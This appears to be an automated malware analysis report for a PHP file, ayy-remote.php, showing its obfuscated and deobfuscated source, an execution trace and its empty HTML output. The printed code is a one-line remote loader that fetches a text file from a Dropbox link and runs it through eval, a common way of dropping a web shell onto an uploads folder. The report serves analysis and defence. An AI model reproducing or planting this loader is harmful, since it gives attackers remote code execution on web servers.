PHP Malware Analysis

ayy-remote.php

md5: bb3d7eb1585879991c6796a005bb933a

Jump to:

Screenshot


Attributes

Execution

Files

URLs


Deobfuscated PHP code

<?php

echo null;
/********/
/*******/
/********/
@eval("?>" . file_get_contents("https://www.dropbox.com/s/wio5a0p8cl9n97u/alfa.txt?raw=1"));
/**/

Execution traces

data/traces/bb3d7eb1585879991c6796a005bb933a_trace-1676244934.4504.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:36:00.348243]
1	0	1	0.000150	393528
1	3	0	0.000198	393848	{main}	1		/var/www/html/uploads/ayy-remote.php	0	0
2	4	0	0.000216	393848	file_get_contents	0		/var/www/html/uploads/ayy-remote.php	1	1	'https://www.dropbox.com/s/wio5a0p8cl9n97u/alfa.txt?raw=1'
2	4	1	0.785476	400304
2	4	R			FALSE
2	5	0	0.785525	400664	eval	1	'?>'	/var/www/html/uploads/ayy-remote.php	1	0
2	5	1	0.785541	400664
1	3	1	0.785549	400376
			0.785584	320576
TRACE END   [2023-02-12 21:36:01.133709]


Generated HTML code

<html><head></head><body></body></html>

Original PHP code

<?=/****/@null; /********/ /*******/ /********/@eval/****/("?>".file_get_contents/*******/("https://www.dropbox.com/s/wio5a0p8cl9n97u/alfa.txt?raw=1"));/**/?>